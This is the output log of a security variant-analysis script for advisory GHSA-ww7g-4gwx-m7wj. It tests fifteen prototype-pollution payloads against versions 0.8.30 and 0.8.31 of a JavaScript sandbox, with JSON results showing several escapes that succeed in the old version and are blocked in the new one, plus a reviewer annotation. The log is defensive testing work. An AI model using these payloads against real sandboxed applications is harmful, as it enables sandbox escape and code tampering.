============================================== GHSA-ww7g-4gwx-m7wj Variant Analysis Script Testing potential bypasses of the 0.8.31 fix ============================================== [INFO] Setting up test environment... [INFO] Installing vulnerable version 0.8.30... Wrote to /root/.pruva/runs/ghsa-ww7g-4gwx-m7wj_20260219-193042/vuln_variant/vuln_test/package.json: { "name": "vuln_test", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "keywords": [], "author": "", "license": "ISC" } npm audit fix Run `npm audit` for details. [INFO] Installing fixed version 0.8.31... Wrote to /root/.pruva/runs/ghsa-ww7g-4gwx-m7wj_20260219-193042/vuln_variant/fixed_test/package.json: { "name": "fixed_test", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "keywords": [], "author": "", "license": "ISC" } added 1 package, and audited 2 packages in 2s found 0 vulnerabilities ============================================== Running tests on VULNERABLE version (0.8.30) ============================================== Testing version: 0.8.30 [Test 1] Array literal with Map.prototype (original vulnerability) [Test 2] Object literal with Map.prototype property [Test 3] Nested array with prototype [Test 4] Array destructuring [Test 5] Spread operator [Test 6] Array concat [Test 7] Array slice [Test 8] Function constructor prototype [Test 9] Object.create with Map.prototype [Test 10] Class extending Map [Test 11] Set prototype via array [Test 12] Array prototype via array [Test 13] Object prototype via array [Test 14] Using .constructor.prototype [Test 15] Using __proto__ via array ---RESULTS--- { "version": "0.8.30", "tests": [ { "name": "Array literal Map.prototype", "code": "const arr = [Map.prototype]; arr[0]._test = \"pwned\"; return \"done\";", "error": null, "result": "done", "polluted": true, "blocked": null }, { "name": "Object 
literal Map.prototype", "code": "const obj = {p: Map.prototype}; obj.p._test = \"pwned\"; return \"done\";", "error": null, "result": "done", "polluted": true, "blocked": null }, { "name": "Nested array", "code": "const arr = [[Map.prototype]]; const p = arr[0][0]; p._test = \"pwned\"; return \"done\";", "error": null, "result": "done", "polluted": true, "blocked": null }, { "name": "Array destructuring", "code": "const [p] = [Map.prototype]; p._test = \"pwned\"; return \"done\";", "error": "Unexpected token 'const': const [p] = [Map.prototype]", "result": null, "polluted": false, "blocked": false }, { "name": "Spread operator", "code": "const arr = [...[Map.prototype]]; arr[0]._test = \"pwned\"; return \"done\";", "error": null, "result": "done", "polluted": true, "blocked": null }, { "name": "Array concat", "code": "const arr = [].concat([Map.prototype]); arr[0]._test = \"pwned\"; return \"done\";", "error": null, "result": "done", "polluted": true, "blocked": null }, { "name": "Array slice", "code": "const arr = [Map.prototype]; const p = arr.slice(0)[0]; p._test = \"pwned\"; return \"done\";", "error": null, "result": "done", "polluted": true, "blocked": null }, { "name": "Function constructor", "code": "function F(){}; F.prototype._test = \"pwned\"; const f = new F(); return f._test;", "error": "Static method or property access not permitted: sandboxedObject.prototype", "result": null, "polluted": false, "blocked": true }, { "name": "Object.create", "code": "const obj = Object.create(Map.prototype); obj._test = \"pwned\"; return \"done\";", "error": "Static method or property access not permitted: Object.create", "result": null, "polluted": false, "blocked": true }, { "name": "Class extends", "code": "class M extends Map {}; M.prototype._test = \"pwned\"; return \"done\";", "error": "Unexpected token 'class': class M extends Map {}", "result": null, "polluted": false, "blocked": false }, { "name": "Set prototype array", "code": "const arr = [Set.prototype]; 
arr[0]._test = \"pwned\"; return \"done\";", "error": null, "result": "done", "polluted": true, "blocked": null }, { "name": "Array prototype array", "code": "const arr = [Array.prototype]; arr[0]._test = \"pwned\"; return \"done\";", "error": null, "result": "done", "polluted": true, "blocked": null }, { "name": "Object prototype array", "code": "const arr = [Object.prototype]; arr[0]._test = \"pwned\"; return \"done\";", "error": "Static method or property access not permitted: Object.prototype", "result": null, "polluted": false, "blocked": true }, { "name": "Constructor.prototype", "code": "const arr = [new Map()]; const p = arr[0].constructor.prototype; p._test = \"pwned\"; return \"done\";", "error": "Cannot assign property '_test' of a global object", "result": null, "polluted": false, "blocked": false }, { "name": "__proto__ via array", "code": "const arr = [new Map()]; const p = arr[0].__proto__; p._test = \"pwned\"; return \"done\";", "error": "Method or property access not permitted: Object.__proto__", "result": null, "polluted": false, "blocked": true } ] }
[Reviewer annotation, not script output: read "polluted" as the outcome of each case and treat "blocked" as a harness label only. The "Array destructuring" and "Class extends" cases stop with an "Unexpected token" parse error in both versions, so their code never ran and they neither confirm nor rule out anything about the prototype guard. On 0.8.30 the "Constructor.prototype" case is recorded with "blocked": false although its write was rejected with an error and "polluted" is false, and "blocked" is null whenever the code ran to completion. In the 0.8.31 results the "Function constructor" case returns "pwned" with "polluted": false: the write went to the prototype of F, a function declared inside the test code, whereas 0.8.30 rejected that same access with an error.]
============================================== Running tests on FIXED version (0.8.31) ============================================== Testing version: 0.8.31 [Test 1] Array literal with Map.prototype (original vulnerability) [Test 2] Object literal with Map.prototype property [Test 3] Nested array with prototype [Test 4] Array destructuring [Test 5] Spread operator [Test 6] Array concat [Test 7] Array slice [Test 8] Function constructor prototype [Test 9] Object.create with Map.prototype [Test 10] Class extending Map [Test 11] Set prototype via array [Test 12] Array prototype via array [Test 13] Object prototype via array [Test 14] Using .constructor.prototype [Test 15] Using __proto__ via array ---RESULTS--- { "version": "0.8.31", "tests": [ { "name": "Array literal Map.prototype", "code": "const arr = [Map.prototype]; arr[0]._test = \"pwned\"; return \"done\";", "error": "Access to prototype of 
global object is not permitted", "result": null, "polluted": false, "blocked": true }, { "name": "Object literal Map.prototype", "code": "const obj = {p: Map.prototype}; obj.p._test = \"pwned\"; return \"done\";", "error": "Access to prototype of global object is not permitted", "result": null, "polluted": false, "blocked": true }, { "name": "Nested array", "code": "const arr = [[Map.prototype]]; const p = arr[0][0]; p._test = \"pwned\"; return \"done\";", "error": "Access to prototype of global object is not permitted", "result": null, "polluted": false, "blocked": true }, { "name": "Array destructuring", "code": "const [p] = [Map.prototype]; p._test = \"pwned\"; return \"done\";", "error": "Unexpected token 'const': const [p] = [Map.prototype]", "result": null, "polluted": false, "blocked": false }, { "name": "Spread operator", "code": "const arr = [...[Map.prototype]]; arr[0]._test = \"pwned\"; return \"done\";", "error": "Access to prototype of global object is not permitted", "result": null, "polluted": false, "blocked": true }, { "name": "Array concat", "code": "const arr = [].concat([Map.prototype]); arr[0]._test = \"pwned\"; return \"done\";", "error": "Access to prototype of global object is not permitted", "result": null, "polluted": false, "blocked": true }, { "name": "Array slice", "code": "const arr = [Map.prototype]; const p = arr.slice(0)[0]; p._test = \"pwned\"; return \"done\";", "error": "Access to prototype of global object is not permitted", "result": null, "polluted": false, "blocked": true }, { "name": "Function constructor", "code": "function F(){}; F.prototype._test = \"pwned\"; const f = new F(); return f._test;", "error": null, "result": "pwned", "polluted": false, "blocked": null }, { "name": "Object.create", "code": "const obj = Object.create(Map.prototype); obj._test = \"pwned\"; return \"done\";", "error": "Static method or property access not permitted: Object.create", "result": null, "polluted": false, "blocked": true }, { "name": 
"Class extends", "code": "class M extends Map {}; M.prototype._test = \"pwned\"; return \"done\";", "error": "Unexpected token 'class': class M extends Map {}", "result": null, "polluted": false, "blocked": false }, { "name": "Set prototype array", "code": "const arr = [Set.prototype]; arr[0]._test = \"pwned\"; return \"done\";", "error": "Access to prototype of global object is not permitted", "result": null, "polluted": false, "blocked": true }, { "name": "Array prototype array", "code": "const arr = [Array.prototype]; arr[0]._test = \"pwned\"; return \"done\";", "error": "Access to prototype of global object is not permitted", "result": null, "polluted": false, "blocked": true }, { "name": "Object prototype array", "code": "const arr = [Object.prototype]; arr[0]._test = \"pwned\"; return \"done\";", "error": "Static method or property access not permitted: Object.prototype", "result": null, "polluted": false, "blocked": true }, { "name": "Constructor.prototype", "code": "const arr = [new Map()]; const p = arr[0].constructor.prototype; p._test = \"pwned\"; return \"done\";", "error": "Access to prototype of global object is not permitted", "result": null, "polluted": false, "blocked": true }, { "name": "__proto__ via array", "code": "const arr = [new Map()]; const p = arr[0].__proto__; p._test = \"pwned\"; return \"done\";", "error": "Access to prototype of global object is not permitted", "result": null, "polluted": false, "blocked": true } ] } ============================================== ANALYSIS RESULTS ==============================================